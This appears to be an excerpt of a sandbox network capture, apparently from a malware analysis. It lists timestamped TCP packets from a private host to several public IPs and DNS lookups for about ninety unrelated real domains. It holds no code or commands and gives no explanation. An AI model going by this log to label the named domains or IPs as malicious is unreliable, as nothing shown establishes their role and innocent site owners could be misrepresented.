Mar 22, 2023 05:43:42.977663040 CET	49912	80	192.168.2.5	62.75.216.137
Mar 22, 2023 05:43:42.977678061 CET	80	49912	62.75.216.137	192.168.2.5
Mar 22, 2023 05:43:42.977778912 CET	80	49912	62.75.216.137	192.168.2.5
Mar 22, 2023 05:43:42.977907896 CET	80	49912	62.75.216.137	192.168.2.5
Mar 22, 2023 05:43:42.978007078 CET	80	49912	62.75.216.137	192.168.2.5
Mar 22, 2023 05:43:42.978025913 CET	49912	80	192.168.2.5	62.75.216.137
Mar 22, 2023 05:43:42.978025913 CET	49912	80	192.168.2.5	62.75.216.137
Mar 22, 2023 05:43:42.978110075 CET	80	49912	62.75.216.137	192.168.2.5
Mar 22, 2023 05:43:42.978178978 CET	49912	80	192.168.2.5	62.75.216.137
Mar 22, 2023 05:43:42.978260040 CET	80	49912	62.75.216.137	192.168.2.5
Mar 22, 2023 05:43:42.978322029 CET	80	49912	62.75.216.137	192.168.2.5
Mar 22, 2023 05:43:42.978445053 CET	80	49912	62.75.216.137	192.168.2.5
Mar 22, 2023 05:43:42.978451014 CET	49912	80	192.168.2.5	62.75.216.137
Mar 22, 2023 05:43:42.978646040 CET	80	49912	62.75.216.137	192.168.2.5
Mar 22, 2023 05:43:42.978727102 CET	49912	80	192.168.2.5	62.75.216.137
Mar 22, 2023 05:43:42.978763103 CET	80	49912	62.75.216.137	192.168.2.5
Mar 22, 2023 05:43:42.978861094 CET	80	49912	62.75.216.137	192.168.2.5
Mar 22, 2023 05:43:42.978883982 CET	80	49912	62.75.216.137	192.168.2.5
Mar 22, 2023 05:43:42.978889942 CET	49912	80	192.168.2.5	62.75.216.137
Mar 22, 2023 05:43:42.978990078 CET	80	49912	62.75.216.137	192.168.2.5
Mar 22, 2023 05:43:42.979094982 CET	80	49912	62.75.216.137	192.168.2.5
Mar 22, 2023 05:43:42.979156971 CET	49912	80	192.168.2.5	62.75.216.137
Mar 22, 2023 05:43:42.979156971 CET	49912	80	192.168.2.5	62.75.216.137
Mar 22, 2023 05:43:42.979157925 CET	49912	80	192.168.2.5	62.75.216.137
Mar 22, 2023 05:43:42.979201078 CET	80	49912	62.75.216.137	192.168.2.5
Mar 22, 2023 05:43:42.979259014 CET	49912	80	192.168.2.5	62.75.216.137
Mar 22, 2023 05:43:42.979429960 CET	80	49912	62.75.216.137	192.168.2.5
Mar 22, 2023 05:43:42.979718924 CET	49912	80	192.168.2.5	62.75.216.137
Mar 22, 2023 05:43:42.995027065 CET	80	49912	62.75.216.137	192.168.2.5
Mar 22, 2023 05:43:42.995090008 CET	80	49912	62.75.216.137	192.168.2.5
Mar 22, 2023 05:43:42.995240927 CET	49912	80	192.168.2.5	62.75.216.137
Mar 22, 2023 05:43:42.995587111 CET	80	49912	62.75.216.137	192.168.2.5
Mar 22, 2023 05:43:42.995606899 CET	80	49912	62.75.216.137	192.168.2.5
Mar 22, 2023 05:43:42.995721102 CET	49912	80	192.168.2.5	62.75.216.137
Mar 22, 2023 05:43:42.995817900 CET	80	49912	62.75.216.137	192.168.2.5
Mar 22, 2023 05:43:42.995876074 CET	49912	80	192.168.2.5	62.75.216.137
Mar 22, 2023 05:43:42.995908022 CET	80	49912	62.75.216.137	192.168.2.5
Mar 22, 2023 05:43:42.995985031 CET	80	49912	62.75.216.137	192.168.2.5
Mar 22, 2023 05:43:42.996058941 CET	80	49912	62.75.216.137	192.168.2.5
Mar 22, 2023 05:43:42.996156931 CET	49912	80	192.168.2.5	62.75.216.137
Mar 22, 2023 05:43:42.996189117 CET	80	49912	62.75.216.137	192.168.2.5
Mar 22, 2023 05:43:42.996321917 CET	80	49912	62.75.216.137	192.168.2.5
Mar 22, 2023 05:43:42.996411085 CET	49912	80	192.168.2.5	62.75.216.137
Mar 22, 2023 05:43:42.996412039 CET	49912	80	192.168.2.5	62.75.216.137
Mar 22, 2023 05:43:42.996671915 CET	80	49912	62.75.216.137	192.168.2.5
Mar 22, 2023 05:43:42.996743917 CET	80	49912	62.75.216.137	192.168.2.5
Mar 22, 2023 05:43:42.996783972 CET	80	49912	62.75.216.137	192.168.2.5
Mar 22, 2023 05:43:42.996803999 CET	80	49912	62.75.216.137	192.168.2.5
Mar 22, 2023 05:43:42.996824026 CET	49912	80	192.168.2.5	62.75.216.137
Mar 22, 2023 05:43:42.996828079 CET	80	49912	62.75.216.137	192.168.2.5
Mar 22, 2023 05:43:42.996928930 CET	49912	80	192.168.2.5	62.75.216.137
Mar 22, 2023 05:43:42.996928930 CET	49912	80	192.168.2.5	62.75.216.137
Mar 22, 2023 05:43:42.996947050 CET	80	49912	62.75.216.137	192.168.2.5
Mar 22, 2023 05:43:42.997064114 CET	80	49912	62.75.216.137	192.168.2.5
Mar 22, 2023 05:43:42.997113943 CET	49912	80	192.168.2.5	62.75.216.137
Mar 22, 2023 05:43:42.997144938 CET	80	49912	62.75.216.137	192.168.2.5
Mar 22, 2023 05:43:42.997267962 CET	80	49912	62.75.216.137	192.168.2.5
Mar 22, 2023 05:43:42.997364998 CET	80	49912	62.75.216.137	192.168.2.5
Mar 22, 2023 05:43:42.997387886 CET	49912	80	192.168.2.5	62.75.216.137
Mar 22, 2023 05:43:42.997452021 CET	49912	80	192.168.2.5	62.75.216.137
Mar 22, 2023 05:43:42.997462988 CET	80	49912	62.75.216.137	192.168.2.5
Mar 22, 2023 05:43:42.997720957 CET	80	49912	62.75.216.137	192.168.2.5
Mar 22, 2023 05:43:42.997819901 CET	80	49912	62.75.216.137	192.168.2.5
Mar 22, 2023 05:43:42.997874975 CET	49912	80	192.168.2.5	62.75.216.137
Mar 22, 2023 05:43:42.997880936 CET	80	49912	62.75.216.137	192.168.2.5
Mar 22, 2023 05:43:42.997977972 CET	80	49912	62.75.216.137	192.168.2.5
Mar 22, 2023 05:43:42.998035908 CET	80	49912	62.75.216.137	192.168.2.5
Mar 22, 2023 05:43:42.998071909 CET	49912	80	192.168.2.5	62.75.216.137
Mar 22, 2023 05:43:42.998071909 CET	49912	80	192.168.2.5	62.75.216.137
Mar 22, 2023 05:43:42.998125076 CET	80	49912	62.75.216.137	192.168.2.5
Mar 22, 2023 05:43:42.998226881 CET	80	49912	62.75.216.137	192.168.2.5
Mar 22, 2023 05:43:42.998235941 CET	49912	80	192.168.2.5	62.75.216.137
Mar 22, 2023 05:43:42.998320103 CET	80	49912	62.75.216.137	192.168.2.5
Mar 22, 2023 05:43:42.998435974 CET	80	49912	62.75.216.137	192.168.2.5
Mar 22, 2023 05:43:42.998564959 CET	49912	80	192.168.2.5	62.75.216.137
Mar 22, 2023 05:43:42.998564959 CET	49912	80	192.168.2.5	62.75.216.137
Mar 22, 2023 05:43:42.998766899 CET	80	49912	62.75.216.137	192.168.2.5
Mar 22, 2023 05:43:42.998850107 CET	49912	80	192.168.2.5	62.75.216.137
Mar 22, 2023 05:43:42.998883009 CET	80	49912	62.75.216.137	192.168.2.5
Mar 22, 2023 05:43:42.998902082 CET	80	49912	62.75.216.137	192.168.2.5
Mar 22, 2023 05:43:42.998955965 CET	80	49912	62.75.216.137	192.168.2.5
Mar 22, 2023 05:43:42.998964071 CET	49912	80	192.168.2.5	62.75.216.137
Mar 22, 2023 05:43:42.999102116 CET	80	49912	62.75.216.137	192.168.2.5
Mar 22, 2023 05:43:42.999124050 CET	80	49912	62.75.216.137	192.168.2.5
Mar 22, 2023 05:43:42.999258995 CET	80	49912	62.75.216.137	192.168.2.5
Mar 22, 2023 05:43:42.999263048 CET	49912	80	192.168.2.5	62.75.216.137
Mar 22, 2023 05:43:42.999263048 CET	49912	80	192.168.2.5	62.75.216.137
Mar 22, 2023 05:43:42.999322891 CET	49912	80	192.168.2.5	62.75.216.137
Mar 22, 2023 05:43:42.999352932 CET	80	49912	62.75.216.137	192.168.2.5
Mar 22, 2023 05:43:42.999408007 CET	80	49912	62.75.216.137	192.168.2.5
Mar 22, 2023 05:43:42.999814987 CET	49912	80	192.168.2.5	62.75.216.137
Mar 22, 2023 05:43:42.999814987 CET	49912	80	192.168.2.5	62.75.216.137
Mar 22, 2023 05:43:43.022852898 CET	80	49911	208.97.178.138	192.168.2.5
Mar 22, 2023 05:43:43.057162046 CET	80	49913	208.97.178.138	192.168.2.5
Mar 22, 2023 05:43:43.057346106 CET	49913	80	192.168.2.5	208.97.178.138
Mar 22, 2023 05:43:43.081414938 CET	80	49909	108.167.164.216	192.168.2.5
Mar 22, 2023 05:43:43.081557989 CET	49909	80	192.168.2.5	108.167.164.216
Mar 22, 2023 05:43:43.100217104 CET	49913	80	192.168.2.5	208.97.178.138
Mar 22, 2023 05:43:43.208961010 CET	80	49913	208.97.178.138	192.168.2.5
Mar 22, 2023 05:43:43.210751057 CET	80	49913	208.97.178.138	192.168.2.5
Mar 22, 2023 05:43:43.210833073 CET	80	49913	208.97.178.138	192.168.2.5
Mar 22, 2023 05:43:43.210836887 CET	49913	80	192.168.2.5	208.97.178.138
Mar 22, 2023 05:43:43.210892916 CET	49913	80	192.168.2.5	208.97.178.138
Mar 22, 2023 05:43:43.233000040 CET	49913	80	192.168.2.5	208.97.178.138
Mar 22, 2023 05:43:43.337203026 CET	49855	80	192.168.2.5	210.140.73.39
Mar 22, 2023 05:43:43.341509104 CET	80	49913	208.97.178.138	192.168.2.5
Mar 22, 2023 05:43:43.346390009 CET	49914	80	192.168.2.5	5.196.166.214
Mar 22, 2023 05:43:43.386606932 CET	80	49914	5.196.166.214	192.168.2.5
Mar 22, 2023 05:43:43.386795998 CET	49914	80	192.168.2.5	5.196.166.214
Mar 22, 2023 05:43:43.387032986 CET	49914	80	192.168.2.5	5.196.166.214
Mar 22, 2023 05:43:43.427947044 CET	80	49914	5.196.166.214	192.168.2.5
Mar 22, 2023 05:43:43.428066969 CET	49914	80	192.168.2.5	5.196.166.214
Mar 22, 2023 05:43:43.428124905 CET	80	49914	5.196.166.214	192.168.2.5
Mar 22, 2023 05:43:43.428199053 CET	49914	80	192.168.2.5	5.196.166.214
Mar 22, 2023 05:43:43.428721905 CET	49915	80	192.168.2.5	188.166.152.188
Mar 22, 2023 05:43:43.448784113 CET	49916	80	192.168.2.5	77.68.50.105
Mar 22, 2023 05:43:43.452457905 CET	49917	80	192.168.2.5	188.114.96.3
Mar 22, 2023 05:43:43.463553905 CET	80	49915	188.166.152.188	192.168.2.5
Mar 22, 2023 05:43:43.467348099 CET	49915	80	192.168.2.5	188.166.152.188
Mar 22, 2023 05:43:43.471740007 CET	49915	80	192.168.2.5	188.166.152.188
Mar 22, 2023 05:43:43.473978996 CET	80	49917	188.114.96.3	192.168.2.5
Mar 22, 2023 05:43:43.474066019 CET	49917	80	192.168.2.5	188.114.96.3
Mar 22, 2023 05:43:43.474618912 CET	49917	80	192.168.2.5	188.114.96.3
Mar 22, 2023 05:43:43.485213041 CET	80	49916	77.68.50.105	192.168.2.5
Mar 22, 2023 05:43:43.485313892 CET	49916	80	192.168.2.5	77.68.50.105
Mar 22, 2023 05:43:43.485652924 CET	49916	80	192.168.2.5	77.68.50.105
Mar 22, 2023 05:43:43.495620012 CET	80	49917	188.114.96.3	192.168.2.5
Mar 22, 2023 05:43:43.504211903 CET	80	49917	188.114.96.3	192.168.2.5
Mar 22, 2023 05:43:43.504301071 CET	49917	80	192.168.2.5	188.114.96.3
Mar 22, 2023 05:43:43.506423950 CET	80	49915	188.166.152.188	192.168.2.5
Mar 22, 2023 05:43:43.506608009 CET	49917	80	192.168.2.5	188.114.96.3
Mar 22, 2023 05:43:43.508069992 CET	80	49915	188.166.152.188	192.168.2.5
Mar 22, 2023 05:43:43.508142948 CET	49915	80	192.168.2.5	188.166.152.188
Mar 22, 2023 05:43:43.522330999 CET	80	49916	77.68.50.105	192.168.2.5
Mar 22, 2023 05:43:43.522459030 CET	80	49916	77.68.50.105	192.168.2.5
Mar 22, 2023 05:43:43.522533894 CET	49916	80	192.168.2.5	77.68.50.105
Mar 22, 2023 05:43:43.531860113 CET	80	49917	188.114.96.3	192.168.2.5
Mar 22, 2023 05:43:43.531939983 CET	49917	80	192.168.2.5	188.114.96.3
Mar 22, 2023 05:43:43.535036087 CET	49918	80	192.168.2.5	188.114.96.3
Mar 22, 2023 05:43:43.556067944 CET	80	49918	188.114.96.3	192.168.2.5
Mar 22, 2023 05:43:43.557234049 CET	49918	80	192.168.2.5	188.114.96.3
Mar 22, 2023 05:43:43.557234049 CET	49918	80	192.168.2.5	188.114.96.3
Mar 22, 2023 05:43:43.578217983 CET	80	49918	188.114.96.3	192.168.2.5
Mar 22, 2023 05:43:43.605422974 CET	80	49918	188.114.96.3	192.168.2.5
Mar 22, 2023 05:43:43.605609894 CET	49918	80	192.168.2.5	188.114.96.3
Mar 22, 2023 05:43:43.607417107 CET	49918	80	192.168.2.5	188.114.96.3
Mar 22, 2023 05:43:43.636976004 CET	80	49918	188.114.96.3	192.168.2.5
Mar 22, 2023 05:43:43.637115002 CET	49918	80	192.168.2.5	188.114.96.3
Mar 22, 2023 05:43:43.656269073 CET	49916	80	192.168.2.5	77.68.50.105
Mar 22, 2023 05:43:43.657592058 CET	49919	80	192.168.2.5	69.163.218.51
Mar 22, 2023 05:43:43.692671061 CET	80	49916	77.68.50.105	192.168.2.5
Mar 22, 2023 05:43:43.692693949 CET	80	49916	77.68.50.105	192.168.2.5
Mar 22, 2023 05:43:43.692791939 CET	49916	80	192.168.2.5	77.68.50.105
Mar 22, 2023 05:43:43.810866117 CET	49920	80	192.168.2.5	23.227.38.74
Mar 22, 2023 05:43:43.827828884 CET	80	49919	69.163.218.51	192.168.2.5
Mar 22, 2023 05:43:43.828018904 CET	49919	80	192.168.2.5	69.163.218.51
Mar 22, 2023 05:43:43.828792095 CET	49919	80	192.168.2.5	69.163.218.51
Mar 22, 2023 05:43:43.833024025 CET	80	49920	23.227.38.74	192.168.2.5
Mar 22, 2023 05:43:43.833143950 CET	49920	80	192.168.2.5	23.227.38.74
Mar 22, 2023 05:43:43.833631039 CET	49920	80	192.168.2.5	23.227.38.74
Mar 22, 2023 05:43:43.854871988 CET	80	49920	23.227.38.74	192.168.2.5
Mar 22, 2023 05:43:43.943833113 CET	49921	80	192.168.2.5	154.203.14.100
Mar 22, 2023 05:43:43.986764908 CET	80	49920	23.227.38.74	192.168.2.5
Mar 22, 2023 05:43:43.987204075 CET	49920	80	192.168.2.5	23.227.38.74
Mar 22, 2023 05:43:43.998389006 CET	80	49919	69.163.218.51	192.168.2.5
Mar 22, 2023 05:43:43.999659061 CET	80	49919	69.163.218.51	192.168.2.5
Mar 22, 2023 05:43:43.999929905 CET	49919	80	192.168.2.5	69.163.218.51

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Mar 22, 2023 05:43:07.938826084 CET	192.168.2.5	8.8.8.8	0xca67	Standard query (0)	www.olras.com	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:43:07.939636946 CET	192.168.2.5	8.8.8.8	0x9de1	Standard query (0)	www.quadlock.com	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:43:07.941828966 CET	192.168.2.5	8.8.8.8	0x4836	Standard query (0)	www.wkhk.net	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:43:07.944896936 CET	192.168.2.5	8.8.8.8	0x6b5	Standard query (0)	www.baijaku.com	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:43:07.948393106 CET	192.168.2.5	8.8.8.8	0x8a1a	Standard query (0)	www.ftchat.com	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:43:07.951306105 CET	192.168.2.5	8.8.8.8	0xeb12	Standard query (0)	www.pr-park.com	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:43:07.953057051 CET	192.168.2.5	8.8.8.8	0xdf3c	Standard query (0)	www.pdqhomes.com	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:43:07.954642057 CET	192.168.2.5	8.8.8.8	0x97b1	Standard query (0)	www.fnw.us	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:43:07.955593109 CET	192.168.2.5	8.8.8.8	0x6411	Standard query (0)	www.dgmna.com	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:43:07.956402063 CET	192.168.2.5	8.8.8.8	0x3f9a	Standard query (0)	www.jenco.co.uk	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:43:08.175811052 CET	192.168.2.5	8.8.8.8	0x4d63	Standard query (0)	www.mqs.com.br	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:43:08.176266909 CET	192.168.2.5	8.8.8.8	0x270f	Standard query (0)	www.rs-ag.com	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:43:08.497096062 CET	192.168.2.5	8.8.8.8	0xcc11	Standard query (0)	www.item-pr.com	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:43:08.606940031 CET	192.168.2.5	8.8.8.8	0x2523	Standard query (0)	www.alteor.cl	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:43:08.608115911 CET	192.168.2.5	8.8.8.8	0x7923	Standard query (0)	www.valdal.com	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:43:09.017699957 CET	192.168.2.5	8.8.8.8	0x71c7	Standard query (0)	www.vazir.se	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:43:09.018515110 CET	192.168.2.5	8.8.8.8	0x62bb	Standard query (0)	www.depalo.com	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:43:09.021537066 CET	192.168.2.5	8.8.8.8	0xa754	Standard query (0)	www.nunomira.com	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:43:09.143091917 CET	192.168.2.5	8.8.8.8	0xf497	Standard query (0)	www.credo.edu.pl	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:43:09.146697044 CET	192.168.2.5	8.8.8.8	0xca23	Standard query (0)	www.elpro.si	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:43:09.187952042 CET	192.168.2.5	8.8.8.8	0xfbfa	Standard query (0)	www.petsfan.com	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:43:09.248627901 CET	192.168.2.5	8.8.8.8	0xb62c	Standard query (0)	www.nelipak.nl	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:43:09.370625973 CET	192.168.2.5	8.8.8.8	0xed35	Standard query (0)	www.otena.com	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:43:10.079495907 CET	192.168.2.5	8.8.8.8	0x9358	Standard query (0)	www.transsib.com	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:43:10.082881927 CET	192.168.2.5	8.8.8.8	0xb2ba	Standard query (0)	www.owsports.ca	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:43:10.083978891 CET	192.168.2.5	8.8.8.8	0x86af	Standard query (0)	www.tvtools.fi	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:43:10.085247040 CET	192.168.2.5	8.8.8.8	0xe873	Standard query (0)	www.edimart.hu	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:43:10.087781906 CET	192.168.2.5	8.8.8.8	0x5334	Standard query (0)	www.jroy.net	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:43:10.087867975 CET	192.168.2.5	8.8.8.8	0x4b86	Standard query (0)	www.t-tre.com	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:43:10.097336054 CET	192.168.2.5	8.8.8.8	0xf217	Standard query (0)	www.evcpa.com	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:43:10.736207962 CET	192.168.2.5	8.8.8.8	0x6cd6	Standard query (0)	www.abart.pl	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:43:11.052344084 CET	192.168.2.5	8.8.8.8	0xe3c3	Standard query (0)	www.vexcom.com	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:43:11.052668095 CET	192.168.2.5	8.8.8.8	0x2384	Standard query (0)	www.hummer.hu	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:43:11.058772087 CET	192.168.2.5	8.8.8.8	0x34c6	Standard query (0)	www.xaicom.es	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:43:11.059794903 CET	192.168.2.5	8.8.8.8	0xe716	Standard query (0)	www.abdg.com	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:43:11.063664913 CET	192.168.2.5	8.8.8.8	0x9a4e	Standard query (0)	www.naoi-a.com	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:43:11.092175961 CET	192.168.2.5	8.8.8.8	0xf397	Standard query (0)	www.cokocoko.com	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:43:11.096067905 CET	192.168.2.5	8.8.8.8	0xee27	Standard query (0)	www.pcgrate.com	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:43:11.098092079 CET	192.168.2.5	8.8.8.8	0x4b64	Standard query (0)	www.ora.ecnet.jp	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:43:11.633172035 CET	192.168.2.5	8.8.8.8	0xce5d	Standard query (0)	www.sjbs.org	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:43:11.675208092 CET	192.168.2.5	8.8.8.8	0xcbe9	Standard query (0)	www.waldi.pl	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:43:11.679362059 CET	192.168.2.5	8.8.8.8	0xe321	Standard query (0)	www.aevga.com	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:43:11.700546026 CET	192.168.2.5	8.8.8.8	0x88eb	Standard query (0)	www.synetik.net	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:43:11.992841005 CET	192.168.2.5	8.8.8.8	0xf917	Standard query (0)	www.holleman.us	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:43:12.025428057 CET	192.168.2.5	8.8.8.8	0xaf22	Standard query (0)	www.yocinc.org	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:43:12.710923910 CET	192.168.2.5	8.8.8.8	0xda2e	Standard query (0)	www.fink.com	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:43:12.798250914 CET	192.168.2.5	8.8.8.8	0x3a24	Standard query (0)	www.netcr.com	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:43:12.798449039 CET	192.168.2.5	8.8.8.8	0xa24e	Standard query (0)	www.udesign.biz	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:43:12.801636934 CET	192.168.2.5	8.8.8.8	0xca57	Standard query (0)	www.stnic.co.uk	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:43:12.804008007 CET	192.168.2.5	8.8.8.8	0x6119	Standard query (0)	www.maktraxx.com	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:43:13.087585926 CET	192.168.2.5	8.8.8.8	0x1685	Standard query (0)	www.jacomfg.com	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:43:13.087918043 CET	192.168.2.5	8.8.8.8	0xbf15	Standard query (0)	www.vitaindu.com	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:43:13.223598003 CET	192.168.2.5	8.8.8.8	0x51c9	Standard query (0)	www.gpthink.com	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:43:13.224348068 CET	192.168.2.5	8.8.8.8	0xe162	Standard query (0)	www.speelhal.net	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:43:13.265847921 CET	192.168.2.5	8.8.8.8	0xd223	Standard query (0)	www.medisa.info	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:43:13.459264994 CET	192.168.2.5	8.8.8.8	0x31ae	Standard query (0)	www.mobilnic.net	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:43:13.462186098 CET	192.168.2.5	8.8.8.8	0xfbd6	Standard query (0)	www.findbc.com	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:43:13.468825102 CET	192.168.2.5	8.8.8.8	0x79d3	Standard query (0)	www.cel-cpa.com	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:43:13.856273890 CET	192.168.2.5	8.8.8.8	0xe81c	Standard query (0)	www.lrsuk.com	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:43:13.864936113 CET	192.168.2.5	8.8.8.8	0xccbe	Standard query (0)	www.nqks.com	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:43:13.868154049 CET	192.168.2.5	8.8.8.8	0x9f5	Standard query (0)	www.jchysk.com	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:43:14.143744946 CET	192.168.2.5	8.8.8.8	0xbf15	Standard query (0)	www.vitaindu.com	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:43:14.384809017 CET	192.168.2.5	8.8.8.8	0xba0e	Standard query (0)	www.c9dd.com	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:43:14.410737991 CET	192.168.2.5	8.8.8.8	0xe411	Standard query (0)	www.usadig.com	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:43:14.423279047 CET	192.168.2.5	8.8.8.8	0x9f10	Standard query (0)	www.fe-bauer.de	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:43:14.567168951 CET	192.168.2.5	8.8.8.8	0xa845	Standard query (0)	www.myropcb.com	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:43:14.821264029 CET	192.168.2.5	8.8.8.8	0xe0b8	Standard query (0)	www.dayvo.com	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:43:14.826680899 CET	192.168.2.5	8.8.8.8	0x14a9	Standard query (0)	www.domon.com	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:43:14.982037067 CET	192.168.2.5	8.8.8.8	0x2d96	Standard query (0)	www.koz1.net	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:43:15.175864935 CET	192.168.2.5	8.8.8.8	0xcac5	Standard query (0)	www.stajum.com	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:43:15.180811882 CET	192.168.2.5	8.8.8.8	0x594a	Standard query (0)	www.pwd.org	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:43:15.181546926 CET	192.168.2.5	8.8.8.8	0xbf15	Standard query (0)	www.vitaindu.com	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:43:15.734987020 CET	192.168.2.5	8.8.8.8	0xdbbf	Standard query (0)	www.kernsafe.com	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:43:20.344674110 CET	192.168.2.5	8.8.8.8	0xcd98	Standard query (0)	www.iamdirt.com	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:43:20.347110987 CET	192.168.2.5	8.8.8.8	0x5d3d	Standard query (0)	www.yoruksut.com	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:43:20.347238064 CET	192.168.2.5	8.8.8.8	0x3c79	Standard query (0)	www.valselit.com	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:43:20.347649097 CET	192.168.2.5	8.8.8.8	0x3755	Standard query (0)	www.pupi.cz	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:43:20.419182062 CET	192.168.2.5	8.8.8.8	0xb26f	Standard query (0)	www.ex-olive.com	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:43:20.865113020 CET	192.168.2.5	8.8.8.8	0x5231	Standard query (0)	www.2print.com	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:43:20.956645012 CET	192.168.2.5	8.8.8.8	0x3060	Standard query (0)	www.wifi4all.nl	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:43:21.318716049 CET	192.168.2.5	8.8.8.8	0x9b30	Standard query (0)	www.wnsavoy.com	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:43:21.336740017 CET	192.168.2.5	8.8.8.8	0x1082	Standard query (0)	www.fcwcvt.org	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:43:21.538284063 CET	192.168.2.5	8.8.8.8	0x2afc	Standard query (0)	www.x0c.com	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:43:22.247540951 CET	192.168.2.5	8.8.8.8	0x15b8	Standard query (0)	www.snugpak.com	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:43:22.250324011 CET	192.168.2.5	8.8.8.8	0x785a	Standard query (0)	www.yumgiskor.kz	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:43:22.592829943 CET	192.168.2.5	8.8.8.8	0x4230	Standard query (0)	www.photo4b.com	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:43:22.930871010 CET	192.168.2.5	8.8.8.8	0x7c78	Standard query (0)	www.crcsi.org	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:43:23.356884003 CET	192.168.2.5	8.8.8.8	0xd941	Standard query (0)	www.ora-ito.com	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:43:25.784647942 CET	192.168.2.5	8.8.8.8	0x7304	Standard query (0)	www.olras.com	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:43:25.788463116 CET	192.168.2.5	8.8.8.8	0x4288	Standard query (0)	www.baijaku.com	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:43:25.789052010 CET	192.168.2.5	8.8.8.8	0xd3f0	Standard query (0)	www.wkhk.net	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:43:25.791490078 CET	192.168.2.5	8.8.8.8	0x331c	Standard query (0)	www.jenco.co.uk	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:43:25.801405907 CET	192.168.2.5	8.8.8.8	0x687d	Standard query (0)	www.pdqhomes.com	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:43:25.802386045 CET	192.168.2.5	8.8.8.8	0xd5ef	Standard query (0)	www.ftchat.com	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:43:25.806231022 CET	192.168.2.5	8.8.8.8	0x5517	Standard query (0)	www.pr-park.com	A (IP address)	IN (0x0001)	false
